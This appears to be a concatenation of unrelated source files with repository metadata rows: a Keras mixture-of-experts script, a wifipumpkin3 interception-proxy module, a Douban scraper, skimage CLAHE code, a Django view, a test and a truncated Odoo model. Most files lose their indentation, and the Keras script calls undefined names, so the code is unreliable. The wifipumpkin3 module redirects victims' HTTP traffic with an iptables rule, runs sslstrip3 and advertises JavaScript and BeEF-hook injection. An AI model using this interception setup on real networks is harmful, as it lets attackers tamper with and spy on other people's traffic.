from nn_arch import nn_models
from keras.utils import np_utils
import numpy as np
import logging
import time
from keras.layers import Dense, Input, Dropout, Lambda
from keras.models import Model
from keras import backend as K
from helper_callbacks import CustomCallback
PATH = '/home/kkalyan3/data/cifar10/'
#PATH = '../../data/cifar10/'
class MOE(object):
def __init__(self):
self.experts = None
self.train_dim = None
self.test_dim = None
self.expert_dim = None
self.iters = 4
self.target = 10
self.wm_xi = None
self.c = 1
self.early_stopping = CustomCallback()
self.warn_log = [["Iter", "Expert Training Error", "Expert Val Error"]]
def get_random(self):
local_expert = {}
random_bucket = np.random.choice(self.experts, self.train_dim[0])
for i, e in enumerate(random_bucket):
if e not in local_expert:
local_expert[e] = [i]
else:
local_expert[e].append(i)
return local_expert
def model_train(self, X, y, X_val, y_val, i):
model = nn_models()
model.ip_shape = X.shape
model = model.lenet5()
model.fit(X, y, batch_size=256, epochs=500, validation_data=(X_val, y_val),
verbose=1, callbacks=[self.early_stopping])
yhat_train = model.predict(X, batch_size=256)
yhat_val = model.predict(x_val, batch_size=256)
train_error = eval_target(yhat_train, y)
val_error = eval_target(yhat_val, y_val)
self.warn_log.append([i, train_error, val_error])
return model
def tensor_product(self, x):
a = x[0]
b = x[1]
b = K.reshape(b, (-1, self.experts, self.target))
y = K.batch_dot(b, a, axes=1)
return y
def gater(self):
dim_inputs_data = Input(shape=(64, ))
dim_mlp_yhat = Input(shape=(self.target * self.experts,))
layer_2 = Dense(150, activation='relu')(dim_inputs_data)
layer_2_b = Dropout(0.5)(layer_2)
layer_3 = Dense(self.experts, name='layer_op', activation='relu', use_bias=False)(layer_2_b)
layer_4 = Lambda(self.tensor_product)([layer_3, dim_mlp_yhat])
layer_4b = Dropout(0.5)(layer_4)
layer_10 = Dense(10, activation='softmax')(layer_4b)
model = Model(inputs=[dim_inputs_data, dim_mlp_yhat], outputs=layer_10)
model.compile(loss='categorical_crossentropy', optimizer='rmsprop', metrics=['accuracy'])
return model
def bucket_function(self, i):
if i == 0:
return self.get_random()
else:
return self.get_expert(self.wm_xi)
def get_expert(self, weight_data):
thresh_hard = int(weight_data.shape[0] / weight_data.shape[1]) + self.c
# [0.2, 0.1, 0.7, 0.1] -> [2, 0 ,1, 3]
sort_index = np.argsort(-1 * weight_data)
thresh_dict = {}
# {0:0 , 1:0 , 2:0 ..}
thresh_dict = thresh_dict.fromkeys(list(range(weight_data.shape[1])), 0)
local_expert = {}
for k, v in enumerate(sort_index):
for i in v:
if thresh_dict[i] < thresh_hard:
thresh_dict[i] += 1
if i not in local_expert:
local_expert[i] = [k]
else:
local_expert[i].append(k)
break
return local_expert
def main(self, x_train, y_train, x_test, y_test, x_val, y_val):
model_prime = nn_models()
model_prime.ip_shape = x_train.shape
model_p = model_prime.lenet5()
model_p.fit(x_train, y_train, batch_size=256, epochs=500, validation_data=(x_val, y_val),
verbose=1, callbacks=[self.early_stopping])
model_prime = Model(inputs=model_p.input,
outputs=model_p.get_layer('dense2').output)
prime_op_tr = model_prime.predict(x_train)
prime_op_tt = model_prime.predict(x_test)
prime_op_v = model_prime.predict(x_val)
prime_op_train = model_p.predict(x_train)
prime_op_val = model_p.predict(x_val)
tre = eval_target(prime_op_train, y_train)
vale = eval_target(prime_op_val, y_val)
self.warn_log.append([-1, tre, vale])
for i in range(self.iters):
split_buckets = self.bucket_function(i)
yhat_train_exp = []
yhats_test_exp = []
yhats_val_exp = []
for expert_index in sorted(split_buckets):
y = y_train[split_buckets[expert_index]]
X = x_train[split_buckets[expert_index]]
model = self.model_train(X, y, x_val, y_val, i)
yhat_train = model.predict(x_train, batch_size=256)
yhats_test = model.predict(x_test, batch_size=256)
yhats_val = model.predict(x_val, batch_size=256)
yhat_train_exp.append(yhat_train)
yhats_test_exp.append(yhats_test)
yhats_val_exp.append(yhats_val)
print("Expert Index {}".format(expert_index))
yhat_tr = np.hstack(yhat_train_exp)
yhat_tt = np.hstack(yhats_test_exp)
yhat_val = np.hstack(yhats_val_exp)
model = self.gater()
history = model.fit([prime_op_tr, yhat_tr], y_train, shuffle=True,
batch_size=256, verbose=1,
validation_data=([prime_op_v, yhat_val], y_val),
epochs=500, callbacks=[self.early_stopping])
yhats_train = model.predict([prime_op_tr, yhat_tr], batch_size=256)
yhats_test = model.predict([prime_op_tt, yhat_tt], batch_size=256)
yhats_val = model.predict([prime_op_v, yhat_val], batch_size=256)
tre = eval_target(yhats_train, y_train)
tte = eval_target(yhats_test, y_test)
vale = eval_target(yhats_val, y_val)
logging.info('{}, {}, {}, {}'.format(i, tre, vale, tte))
expert_units = Model(inputs=model.input,
outputs=model.get_layer('layer_op').output)
self.wm_xi = expert_units.predict([prime_op_tr, yhat_tr])
return "Gater Training Complete"
if __name__ == '__main__':
start_time = time.time()
logging.basicConfig(filename='../log/cifair_gater_simple_prime_lenet'+str(start_time), level=logging.INFO)
logging.info('##### NEW EXPERIMENT_' + str(start_time) + '_#####')
TRAIN = PATH + 'train/400/'
TEST = PATH + 'test/400/'
VAL = PATH + 'val/400/'
x_train = load_array(TRAIN + 'x_train.bc/')
y_train = load_array(TRAIN + 'y_train.bc/')
x_test = load_array(TEST + 'x_test.bc/')
y_test = load_array(TEST + 'y_test.bc/')
x_val = load_array(VAL + 'x_val.bc/')
y_val = load_array(VAL + 'y_val.bc/')
y_train = np_utils.to_categorical(y_train, 10)
y_test = np_utils.to_categorical(y_test, 10)
y_val = np_utils.to_categorical(y_val, 10)
x_train = x_train.astype('float32')
x_test = x_test.astype('float32')
x_val = x_val.astype('float32')
x_train /= 255
x_test /= 255
x_val /= 255
mean_image = np.mean(x_train, axis=0)
x_train -= mean_image
x_test -= mean_image
x_val -= mean_image
# Pre process end
uniform = MOE()
uniform.experts = 10
uniform.train_dim = x_train.shape
uniform.test_dim = x_test.shape
logging.info("Experts " + str(uniform.experts))
logging.info("Train " + str(x_train.shape))
logging.info("Val " + str(x_val.shape))
logging.info("Test " + str(x_test.shape))
logging.info('{}, {}, {}, {}'.format("Iter", "Training Error", "Val Error", "Test Error"))
uniform.main(x_train, y_train, x_test, y_test, x_val, y_val)
total_time = (time.time() - start_time)/60
logging.info("Total Time " + str(total_time))
for i in uniform.warn_log:
logging.warning(i)
logging.info("#### Experiment Complete ####")
| [
"krishnakalyan3@gmail.com"
] | krishnakalyan3@gmail.com |
687250aac92bf01376a32104c14b0ea2953ebf56 | 410de43884e51d1edef0bb31035d6e78e3f0f3c0 | /wifipumpkin3/core/servers/proxy/pumpkin_proxy.py | ddf931d79053fac9d7daf8e3bd2b29f2052275af | [
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] | permissive | tirkarthi/wifipumpkin3 | 7af13f4f5c7908e555660f4a29b71d245174daa7 | 809baef0c8116410a26f6b263a457f0a1d7f98b9 | refs/heads/master | 2022-12-07T05:25:18.270403 | 2020-08-02T02:04:11 | 2020-08-02T02:04:11 | 291,266,640 | 0 | 0 | Apache-2.0 | 2020-08-29T12:25:13 | 2020-08-29T12:25:12 | null | UTF-8 | Python | false | false | 5,494 | py | from wifipumpkin3.core.config.globalimport import *
from collections import OrderedDict
from functools import partial
from threading import Thread
import queue
from scapy.all import *
import logging, os
import wifipumpkin3.core.utility.constants as C
from wifipumpkin3.core.servers.proxy.proxymode import *
from wifipumpkin3.core.utility.collection import SettingsINI
from wifipumpkin3.core.common.uimodel import *
from wifipumpkin3.core.widgets.docks.dock import DockableWidget
# This file is part of the wifipumpkin3 Open Source Project.
# wifipumpkin3 is licensed under the Apache 2.0.
# Copyright 2020 P0cL4bs Team - Marcos Bomfim (mh4x0f)
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
class TCPProxyDock(DockableWidget):
id = "TCPProxy"
title = "TCPProxy"
def __init__(self, parent=0, title="", info={}):
super(TCPProxyDock, self).__init__(parent, title, info={})
self.setObjectName(self.title)
self.THeaders = OrderedDict([("Plugin", []), ("Logging", [])])
def writeModeData(self, data):
""" get data output and add on QtableWidgets """
self.THeaders["Plugin"].append(data.keys()[0])
self.THeaders["Logging"].append(data[data.keys()[0]])
Headers = []
print(data)
def stopProcess(self):
pass
class PumpKinProxy(ProxyMode):
Name = "PumpkinProxy 3"
Author = "Pumpkin-Dev"
ID = "pumpkinproxy"
Description = "Transparent proxies that you can use to intercept and manipulate HTTP traffic modifying requests and responses, that allow to inject javascripts into the targets visited."
Hidden = False
LogFile = C.LOG_PUMPKINPROXY
CONFIGINI_PATH = C.CONFIG_PP_INI
_cmd_array = []
ModSettings = True
RunningPort = 8080
ModType = "proxy"
TypePlugin = 1
def __init__(self, parent=None, **kwargs):
super(PumpKinProxy, self).__init__(parent)
self.setID(self.ID)
self.parent = parent
self.setTypePlugin(self.TypePlugin)
self.setRunningPort(self.conf.get("proxy_plugins", "pumpkinproxy_config_port"))
def Initialize(self):
self.add_default_rules(
"iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port {}".format(
self.conf.get("proxy_plugins", "pumpkinproxy_config_port")
)
)
self.runDefaultRules()
@property
def CMD_ARRAY(self):
port_ssltrip = self.conf.get("proxy_plugins", "pumpkinproxy_config_port")
self._cmd_array = ["-l", port_ssltrip]
return self._cmd_array
def boot(self):
self.reactor = ProcessThread({"sslstrip3": self.CMD_ARRAY})
self.reactor._ProcssOutput.connect(self.LogOutput)
self.reactor.setObjectName(self.ID)
@property
def getPlugins(self):
commands = self.config.get_all_childname("plugins")
list_commands = []
for command in commands:
list_commands.append(self.ID + "." + command)
# find all plugin from pumpkinproxy
for sub_plugin in self.config.get_all_childname("set_{}".format(command)):
list_commands.append("{}.{}.{}".format(self.ID, command, sub_plugin))
return list_commands
def LogOutput(self, data):
if self.conf.get("accesspoint", "status_ap", format=bool):
self.logger.info(data)
def parser_set_pumpkinproxy(self, status, plugin_name):
if len(plugin_name.split(".")) == 2:
try:
# plugin_name = pumpkinproxy.no-cache
name_plugin, key_plugin = (
plugin_name.split(".")[0],
plugin_name.split(".")[1],
)
if key_plugin in self.config.get_all_childname("plugins"):
self.config.set("plugins", key_plugin, status)
else:
print(
display_messages(
"unknown plugin: {}".format(key_plugin), error=True
)
)
except IndexError:
print(display_messages("unknown sintax command", error=True))
elif len(plugin_name.split(".")) == 3:
try:
# plugin_name = pumpkinproxy.beef.url_hook
name_plugin, key_plugin = (
plugin_name.split(".")[1],
plugin_name.split(".")[2],
)
if key_plugin in self.config.get_all_childname(
"set_{}".format(name_plugin)
):
self.config.set("set_{}".format(name_plugin), key_plugin, status)
else:
print(
display_messages(
"unknown plugin: {}".format(key_plugin), error=True
)
)
except IndexError:
print(display_messages("unknown sintax command", error=True))
| [
"mh4root@gmail.com"
] | mh4root@gmail.com |
fa56efff49eee1254f0c1da3bae2a1b0d65471aa | edbabcc3a43a46f83c656f82248f757387629c32 | /weibo_spider/douban.py | 4a8c7e13b96eb2cbc76cbd7f78d9e35f14fc4158 | [] | no_license | INJNainggolan/Pycharm_work | b84fd8b4cd5158161956c96da326e3f0eba6b2eb | 8314aa23ade681cbad9e7abb4d35de508d46482b | refs/heads/master | 2020-04-08T03:30:35.177056 | 2018-03-07T13:15:09 | 2018-03-07T13:15:09 | 124,235,217 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,547 | py | #coding:utf-8
__author__ = 'hang'
import warnings
warnings.filterwarnings("ignore")
import jieba #分词包
import numpy #numpy计算包
import codecs #codecs提供的open方法来指定打开的文件的语言编码,它会在读取的时候自动转换为内部unicode
import re
import pandas as pd
import matplotlib.pyplot as plt
from urllib import request
from bs4 import BeautifulSoup as bs
#%matplotlib inline
import matplotlib
matplotlib.rcParams['figure.figsize'] = (10.0, 5.0)
from wordcloud import WordCloud#词云包
#分析网页函数
def getNowPlayingMovie_list():
resp = request.urlopen('https://movie.douban.com/nowplaying/hangzhou/')
html_data = resp.read().decode('utf-8')
soup = bs(html_data, 'html.parser')
nowplaying_movie = soup.find_all('div', id='nowplaying')
nowplaying_movie_list = nowplaying_movie[0].find_all('li', class_='list-item')
nowplaying_list = []
for item in nowplaying_movie_list:
nowplaying_dict = {}
nowplaying_dict['id'] = item['data-subject']
for tag_img_item in item.find_all('img'):
nowplaying_dict['name'] = tag_img_item['alt']
nowplaying_list.append(nowplaying_dict)
return nowplaying_list
#爬取评论函数
def getCommentsById(movieId, pageNum):
eachCommentList = [];
if pageNum>0:
start = (pageNum-1) * 20
else:
return False
requrl = 'https://movie.douban.com/subject/' + movieId + '/comments' +'?' +'start=' + str(start) + '&limit=20'
print(requrl)
resp = request.urlopen(requrl)
html_data = resp.read().decode('utf-8')
soup = bs(html_data, 'html.parser')
comment_div_lits = soup.find_all('div', class_='comment')
for item in comment_div_lits:
if item.find_all('p')[0].string is not None:
eachCommentList.append(item.find_all('p')[0].string)
return eachCommentList
def main():
#循环获取第一个电影的前10页评论
commentList = []
NowPlayingMovie_list = getNowPlayingMovie_list()
for i in range(10):
num = i + 1
commentList_temp = getCommentsById(NowPlayingMovie_list[0]['id'], num)
commentList.append(commentList_temp)
#将列表中的数据转换为字符串
comments = ''
for k in range(len(commentList)):
comments = comments + (str(commentList[k])).strip()
#使用正则表达式去除标点符号
pattern = re.compile(r'[\u4e00-\u9fa5]+')
filterdata = re.findall(pattern, comments)
cleaned_comments = ''.join(filterdata)
#使用结巴分词进行中文分词
segment = jieba.lcut(cleaned_comments)
words_df=pd.DataFrame({'segment':segment})
#去掉停用词
stopwords=pd.read_csv("stopwords.txt",index_col=False,quoting=3,sep="\t",names=['stopword'], encoding='utf-8')#quoting=3全不引用
words_df=words_df[~words_df.segment.isin(stopwords.stopword)]
#统计词频
words_stat=words_df.groupby(by=['segment'])['segment'].agg({"计数":numpy.size})
words_stat=words_stat.reset_index().sort_values(by=["计数"],ascending=False)
#用词云进行显示
wordcloud=WordCloud(font_path="simhei.ttf",background_color="white",max_font_size=80)
word_frequence = {x[0]:x[1] for x in words_stat.head(1000).values}
word_frequence_list = []
for key in word_frequence:
temp = (key,word_frequence[key])
word_frequence_list.append(temp)
wordcloud=wordcloud.fit_words(word_frequence_list)
plt.imshow(wordcloud)
#主函数
if __name__ == '__main__':
main() | [
"Nainggolan@github.com"
] | Nainggolan@github.com |
c419b5f6c94fb876209a5e25dc5e3c375f29eb2e | 76a8ea60480331f0f61aeb61de55be9a6270e733 | /downloadable-site-packages/skimage/exposure/_adapthist.py | 0174274bc0147997bd63d884fa2589b3ee37c7de | [
"MIT"
] | permissive | bhagyas/Pyto | cd2ec3f35bec703db4ac29b56d17abc4bf03e375 | 907024a9b3e04a2a9de54976778c0e1a56b7b83c | refs/heads/master | 2022-11-19T13:05:07.392454 | 2020-07-21T17:33:39 | 2020-07-21T17:33:39 | 281,886,535 | 2 | 0 | MIT | 2020-07-23T07:48:03 | 2020-07-23T07:48:02 | null | UTF-8 | Python | false | false | 11,022 | py | """
Adapted code from "Contrast Limited Adaptive Histogram Equalization" by Karel
Zuiderveld <karel@cv.ruu.nl>, Graphics Gems IV, Academic Press, 1994.
http://tog.acm.org/resources/GraphicsGems/
The Graphics Gems code is copyright-protected. In other words, you cannot
claim the text of the code as your own and resell it. Using the code is
permitted in any program, product, or library, non-commercial or commercial.
Giving credit is not required, though is a nice gesture. The code comes as-is,
and if there are any flaws or problems with any Gems code, nobody involved with
Gems - authors, editors, publishers, or webmasters - are to be held
responsible. Basically, don't be a jerk, and remember that anything free
comes with no guarantee.
"""
import numbers
import numpy as np
from ..util import img_as_float, img_as_uint
from ..color.adapt_rgb import adapt_rgb, hsv_value
from ..exposure import rescale_intensity
NR_OF_GREY = 2 ** 14 # number of grayscale levels to use in CLAHE algorithm
@adapt_rgb(hsv_value)
def equalize_adapthist(image, kernel_size=None,
clip_limit=0.01, nbins=256):
"""Contrast Limited Adaptive Histogram Equalization (CLAHE).
An algorithm for local contrast enhancement, that uses histograms computed
over different tile regions of the image. Local details can therefore be
enhanced even in regions that are darker or lighter than most of the image.
Parameters
----------
image : (M, N[, C]) ndarray
Input image.
kernel_size: integer or list-like, optional
Defines the shape of contextual regions used in the algorithm. If
iterable is passed, it must have the same number of elements as
``image.ndim`` (without color channel). If integer, it is broadcasted
to each `image` dimension. By default, ``kernel_size`` is 1/8 of
``image`` height by 1/8 of its width.
clip_limit : float, optional
Clipping limit, normalized between 0 and 1 (higher values give more
contrast).
nbins : int, optional
Number of gray bins for histogram ("data range").
Returns
-------
out : (M, N[, C]) ndarray
Equalized image.
See Also
--------
equalize_hist, rescale_intensity
Notes
-----
* For color images, the following steps are performed:
- The image is converted to HSV color space
- The CLAHE algorithm is run on the V (Value) channel
- The image is converted back to RGB space and returned
* For RGBA images, the original alpha channel is removed.
References
----------
.. [1] http://tog.acm.org/resources/GraphicsGems/
.. [2] https://en.wikipedia.org/wiki/CLAHE#CLAHE
"""
image = img_as_uint(image)
image = rescale_intensity(image, out_range=(0, NR_OF_GREY - 1))
if kernel_size is None:
kernel_size = (image.shape[0] // 8, image.shape[1] // 8)
elif isinstance(kernel_size, numbers.Number):
kernel_size = (kernel_size,) * image.ndim
elif len(kernel_size) != image.ndim:
ValueError('Incorrect value of `kernel_size`: {}'.format(kernel_size))
kernel_size = [int(k) for k in kernel_size]
image = _clahe(image, kernel_size, clip_limit * nbins, nbins)
image = img_as_float(image)
return rescale_intensity(image)
def _clahe(image, kernel_size, clip_limit, nbins=128):
"""Contrast Limited Adaptive Histogram Equalization.
Parameters
----------
image : (M, N) ndarray
Input image.
kernel_size: 2-tuple of int
Defines the shape of contextual regions used in the algorithm.
clip_limit : float
Normalized clipping limit (higher values give more contrast).
nbins : int, optional
Number of gray bins for histogram ("data range").
Returns
-------
out : (M, N) ndarray
Equalized image.
The number of "effective" greylevels in the output image is set by `nbins`;
selecting a small value (eg. 128) speeds up processing and still produce
an output image of good quality. The output image will have the same
minimum and maximum value as the input image. A clip limit smaller than 1
results in standard (non-contrast limited) AHE.
"""
if clip_limit == 1.0:
return image # is OK, immediately returns original image.
nr = int(np.ceil(image.shape[0] / kernel_size[0]))
nc = int(np.ceil(image.shape[1] / kernel_size[1]))
row_step = int(np.floor(image.shape[0] / nr))
col_step = int(np.floor(image.shape[1] / nc))
bin_size = 1 + NR_OF_GREY // nbins
lut = np.arange(NR_OF_GREY)
lut //= bin_size
map_array = np.zeros((nr, nc, nbins), dtype=int)
# Calculate greylevel mappings for each contextual region
for r in range(nr):
for c in range(nc):
sub_img = image[r * row_step: (r + 1) * row_step,
c * col_step: (c + 1) * col_step]
if clip_limit > 0.0: # Calculate actual cliplimit
clim = int(clip_limit * sub_img.size / nbins)
if clim < 1:
clim = 1
else:
clim = NR_OF_GREY # Large value, do not clip (AHE)
hist = lut[sub_img.ravel()]
hist = np.bincount(hist)
hist = np.append(hist, np.zeros(nbins - hist.size, dtype=int))
hist = clip_histogram(hist, clim)
hist = map_histogram(hist, 0, NR_OF_GREY - 1, sub_img.size)
map_array[r, c] = hist
# Interpolate greylevel mappings to get CLAHE image
rstart = 0
for r in range(nr + 1):
cstart = 0
if r == 0: # special case: top row
r_offset = row_step / 2.0
rU = 0
rB = 0
elif r == nr: # special case: bottom row
r_offset = row_step / 2.0
rU = nr - 1
rB = rU
else: # default values
r_offset = row_step
rU = r - 1
rB = rB + 1
for c in range(nc + 1):
if c == 0: # special case: left column
c_offset = col_step / 2.0
cL = 0
cR = 0
elif c == nc: # special case: right column
c_offset = col_step / 2.0
cL = nc - 1
cR = cL
else: # default values
c_offset = col_step
cL = c - 1
cR = cL + 1
mapLU = map_array[rU, cL]
mapRU = map_array[rU, cR]
mapLB = map_array[rB, cL]
mapRB = map_array[rB, cR]
cslice = np.arange(cstart, cstart + c_offset)
rslice = np.arange(rstart, rstart + r_offset)
interpolate(image, cslice, rslice,
mapLU, mapRU, mapLB, mapRB, lut)
cstart += c_offset # set pointer on next matrix */
rstart += r_offset
return image
def clip_histogram(hist, clip_limit):
"""Perform clipping of the histogram and redistribution of bins.
The histogram is clipped and the number of excess pixels is counted.
Afterwards the excess pixels are equally redistributed across the
whole histogram (providing the bin count is smaller than the cliplimit).
Parameters
----------
hist : ndarray
Histogram array.
clip_limit : int
Maximum allowed bin count.
Returns
-------
hist : ndarray
Clipped histogram.
"""
# calculate total number of excess pixels
excess_mask = hist > clip_limit
excess = hist[excess_mask]
n_excess = excess.sum() - excess.size * clip_limit
# Second part: clip histogram and redistribute excess pixels in each bin
bin_incr = int(n_excess / hist.size) # average binincrement
upper = clip_limit - bin_incr # Bins larger than upper set to cliplimit
hist[excess_mask] = clip_limit
low_mask = hist < upper
n_excess -= hist[low_mask].size * bin_incr
hist[low_mask] += bin_incr
mid_mask = (hist >= upper) & (hist < clip_limit)
mid = hist[mid_mask]
n_excess -= mid.size * clip_limit - mid.sum()
hist[mid_mask] = clip_limit
prev_n_excess = n_excess
while n_excess > 0: # Redistribute remaining excess
index = 0
while n_excess > 0 and index < hist.size:
under_mask = hist < 0
step_size = int(hist[hist < clip_limit].size / n_excess)
step_size = max(step_size, 1)
indices = np.arange(index, hist.size, step_size)
under_mask[indices] = True
under_mask = (under_mask) & (hist < clip_limit)
hist[under_mask] += 1
n_excess -= under_mask.sum()
index += 1
# bail if we have not distributed any excess
if prev_n_excess == n_excess:
break
prev_n_excess = n_excess
return hist
def map_histogram(hist, min_val, max_val, n_pixels):
"""Calculate the equalized lookup table (mapping).
It does so by cumulating the input histogram.
Parameters
----------
hist : ndarray
Clipped histogram.
min_val : int
Minimum value for mapping.
max_val : int
Maximum value for mapping.
n_pixels : int
Number of pixels in the region.
Returns
-------
out : ndarray
Mapped intensity LUT.
"""
out = np.cumsum(hist).astype(float)
scale = ((float)(max_val - min_val)) / n_pixels
out *= scale
out += min_val
out[out > max_val] = max_val
return out.astype(int)
def interpolate(image, xslice, yslice,
mapLU, mapRU, mapLB, mapRB, lut):
"""Find the new grayscale level for a region using bilinear interpolation.
Parameters
----------
image : ndarray
Full image.
xslice, yslice : array-like
Indices of the region.
map* : ndarray
Mappings of greylevels from histograms.
lut : ndarray
Maps grayscale levels in image to histogram levels.
Returns
-------
out : ndarray
Original image with the subregion replaced.
Notes
-----
This function calculates the new greylevel assignments of pixels within
a submatrix of the image. This is done by a bilinear interpolation between
four different mappings in order to eliminate boundary artifacts.
"""
norm = xslice.size * yslice.size # Normalization factor
# interpolation weight matrices
x_coef, y_coef = np.meshgrid(np.arange(xslice.size),
np.arange(yslice.size))
x_inv_coef, y_inv_coef = x_coef[:, ::-1] + 1, y_coef[::-1] + 1
view = image[int(yslice[0]):int(yslice[-1] + 1),
int(xslice[0]):int(xslice[-1] + 1)]
im_slice = lut[view]
new = ((y_inv_coef * (x_inv_coef * mapLU[im_slice]
+ x_coef * mapRU[im_slice])
+ y_coef * (x_inv_coef * mapLB[im_slice]
+ x_coef * mapRB[im_slice]))
/ norm)
view[:, :] = new
return image
| [
"adrilabbelol@gmail.com"
] | adrilabbelol@gmail.com |
8d4ab8697bc69c095b7c8d6b18ed034aff53b586 | 85b3c686db76bce624a262de20ffb0b882840fdd | /social_bookmarking/views.py | a8de490964067340914be4d7af222a0ca1033d5f | [
"MIT"
] | permissive | truongsinh/django-social-media | 6361413a80bac6e3827dd725cca95db1c82a2974 | 90f51d97409d87b598386f2ca82e6e3168478d32 | refs/heads/master | 2020-12-25T11:53:21.394434 | 2011-02-19T08:47:08 | 2011-02-19T08:47:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,134 | py | from django.shortcuts import get_object_or_404, redirect
from django.http import Http404
from django.contrib.contenttypes.models import ContentType
from django.core.exceptions import ObjectDoesNotExist
from social_bookmarking.models import BookmarkRelated, Bookmark
def bookmark_referer(request, slug, content_type, object_pk, url):
"""
Redirect to bookmark url if content_type exists
and object related exists too.
If there is no error, the related bookmark counter is incremented.
"""
bookmark = get_object_or_404(Bookmark, slug=slug)
app, model = content_type.split('.')
try:
ctype = ContentType.objects.get(app_label=app, model=model)
content_object = ctype.get_object_for_this_type(pk=object_pk)
except ObjectDoesNotExist:
raise Http404
related, is_created = BookmarkRelated.objects.get_or_create(content_type=ctype,
object_id=content_object.pk,
bookmark=bookmark)
related.visits += 1
related.save()
return redirect(url) | [
"florent.messa@gmail.com"
] | florent.messa@gmail.com |
f6797ec80344efdb57b3bf0cc450d5e008058142 | df7f13ec34591fe1ce2d9aeebd5fd183e012711a | /hata/discord/guild/guild_join_request_delete_event/tests/test__parse_guild_id.py | d0a4cde74f5380fcf06b03c4fad8746b6745a2a9 | [
"LicenseRef-scancode-warranty-disclaimer"
] | permissive | HuyaneMatsu/hata | 63e2f6a2d7a7539fd8f18498852d9d3fe5c41d2e | 53f24fdb38459dc5a4fd04f11bdbfee8295b76a4 | refs/heads/master | 2023-08-20T15:58:09.343044 | 2023-08-20T13:09:03 | 2023-08-20T13:09:03 | 163,677,173 | 3 | 3 | Apache-2.0 | 2019-12-18T03:46:12 | 2018-12-31T14:59:47 | Python | UTF-8 | Python | false | false | 600 | py | import vampytest
from ..fields import parse_guild_id
def _iter_options():
guild_id = 202305160007
yield {}, 0
yield {'guild_id': None}, 0
yield {'guild_id': str(guild_id)}, guild_id
@vampytest._(vampytest.call_from(_iter_options()).returning_last())
def test__parse_guild_id(input_data):
"""
Tests whether ``parse_guild_id`` works as intended.
Parameters
----------
input_data : `dict<str, object>`
Data to try to parse the guild identifier from.
Returns
-------
output : `int`
"""
return parse_guild_id(input_data)
| [
"re.ism.tm@gmail.com"
] | re.ism.tm@gmail.com |
0343aa919475892c10a18e355ebc64fa364d40a9 | cd872ab5bce8dd111952af4721c5f270e7236344 | /edsys_fee_enhancement/model/registration.py | ce2846a5939273dc262601522627dd22d68ad655 | [] | no_license | probytesodoo/edsys_school_erp | 26e2dd24d907bf76be00ac17872d84ae3a5fdf7e | 0e65e5d937b029beb69563772197b9b050748407 | refs/heads/master | 2020-04-15T22:21:02.623926 | 2019-03-12T13:47:03 | 2019-03-12T13:47:03 | 165,069,627 | 1 | 2 | null | 2019-01-16T09:41:01 | 2019-01-10T14:00:36 | Python | UTF-8 | Python | false | false | 14,490 | py | from odoo import models, fields, api, _
import datetime
from odoo.exceptions import except_orm
import base64
class Registration(models.Model):
_inherit = 'registration'
discount_applicable_date = fields.Date('Discount Applicable Date')
fee_computation_ids = fields.One2many('fee.computation', 'registration_id' ,'Fee Computation')
@api.multi
def write(self, vals):
if 'discount_applicable_date' in vals and vals['discount_applicable_date']:
discount_applicable_date_formatted = datetime.datetime.strptime(vals['discount_applicable_date'], "%Y-%m-%d").date()
current_date = datetime.date.today()
acd_yr_start_date = self.batch_id.start_date
acd_yr_end_date = self.batch_id.end_date
acd_yr_start_date_formatted = datetime.datetime.strptime(acd_yr_start_date, "%Y-%m-%d").date()
acd_yr_end_date_formatted = datetime.datetime.strptime(acd_yr_end_date, "%Y-%m-%d").date()
if discount_applicable_date_formatted < acd_yr_start_date_formatted and discount_applicable_date_formatted > acd_yr_end_date_formatted:
raise except_orm(_('Warning!'), _("Discount Applicable Date should between academic year start date and end date "))
return super(Registration, self).write(vals)
@api.multi
def generate_payable_fee_recs(self,flag):
"""
this method used when student pay Academy fee manualy.
after fee pay fee status will be changed as
academy fee unpaid to fee paid.
------------------------------------------
@param self : object pointer
"""
sequence = 1
if self.fee_structure_confirm!=True:
raise except_orm(_("Warning!"), _('Please Confirm the fee structure before paying fee'))
stud_payble_obj = self.env['student.payble.fee']
if self.student_id:
stud_payble_val = {}
if self.fee_computation_ids :
for fee_computation_line_rec in self.fee_computation_ids[0].fee_computation_line_ids:
if not fee_computation_line_rec.name.property_account_income_id.id:
raise except_orm(_("Warning!"), _('Please define property income account for fees %s') % fee_computation_line_rec.name.name)
stud_payble_rec = stud_payble_obj.search_count([('month_id','=',self.fee_computation_ids[0].month_id.id),
('name','=',fee_computation_line_rec.name.id),
('fee_pay_type','=',fee_computation_line_rec.fee_payment_type_id.id),
('student_id','=',self.student_id.id)])
if stud_payble_rec == 0:
stud_payble_val = {
'name': fee_computation_line_rec.name.id,
'student_id': self.student_id.id,
'month_id' : self.fee_computation_ids[0].month_id.id,
'fee_pay_type' : fee_computation_line_rec.fee_payment_type_id.id,
'cal_amount' : 0,
'total_amount' : fee_computation_line_rec.payable_amount,
'discount_amount' : 0,
}
stud_payble_obj.create(stud_payble_val)
else :
raise except_orm(_("Warning!"), _('Fee computation does not exists'))
else:
raise except_orm(_("Warning!"), _('Student Not Found'))
#raise except_orm(_("Warning!"), _('stop'))
@api.multi
def send_payfort_acd_for_next_year_computation(self):
"""
This method is use when enquiry for next year.
--------------------------------------------
:return: It return record set.
"""
next_year_advance_fee_obj = self.env['next.year.advance.fee']
sequence = 1
stud_payble_obj = self.env['student.payble.fee']
next_year_advance_fee_line_data = []
if not self.student_id.property_account_customer_advance.id:
raise except_orm(_('Warning!'),
_("Please define student Advance Payment Account!"))
for fee_computation_line_rec in self.student_id.fee_computation_ids[0].fee_computation_line_ids:
next_year_advance_fee_line_data.append((0,0,{
'name' : fee_computation_line_rec.name.id,
'description' : fee_computation_line_rec.name.name,
'account_id' : self.student_id.property_account_customer_advance.id,
'priority' : sequence,
'amount' : fee_computation_line_rec.calculated_amount,
'rem_amount' : fee_computation_line_rec.calculated_amount,
}))
sequence += 1
if fee_computation_line_rec.discount_percentage > 0.00 or fee_computation_line_rec.discount_amount > 0.00:
if not fee_computation_line_rec.name.fees_discount:
raise except_orm(_("Warning!"), _('Please define Discount Fees for %s.')%(fee_computation_line_rec.name.name))
else:
